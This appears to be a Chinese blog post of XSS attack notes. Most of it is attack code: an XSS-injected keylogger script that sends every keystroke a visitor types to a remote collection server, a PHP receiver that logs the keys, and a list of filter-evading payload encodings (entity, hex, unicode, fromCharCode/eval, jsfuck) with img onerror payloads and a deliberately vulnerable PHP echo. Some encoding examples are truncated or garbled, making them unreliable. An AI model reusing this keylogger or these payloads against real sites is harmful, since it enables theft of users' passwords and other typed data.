Ushiromiya
xss攻击
xss键盘记录#
xss插入代码
<script type="text/javascript" src="./log.js"></script>
log.js
document.onkeypress=function(evt){
evt=evt ? evt : window.event;
key=String.fromCharCode(evt.keyCode ? evt.keyCode : evt.charCode);
if(key){
var http=new XMLHttpRequest();
var param=encodeURI(key);
http.open("POST","http://本地服务器IP/keylog/log.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
log.php
<?php
$key=$_POST['key'];
$logfile='key.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
>
xss编码方式#
html实体编码
HTML解析器能识别在文本里和参数或属性值里的实体编码
无法写进<script>标签内容,只能配合事件触发
<img src=x onerror=alert(1)>
十进制:ale
十六进制:()
进制编码
<script>eval(String.fromCharCode())</script>
<img src=x onerror=eval(String.fromCharCode())>
十进制:97,108,22
十六进制:\x61\x6c\x65
unicode:\u0061\u006c\u0065
url编码
<?php $xss=$_GET['xss'];echo $xss;?>
jsfuck
<img src=x onerror=js编码>
<script>js编码</script>
<script>function("alert(1)")()</script>
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!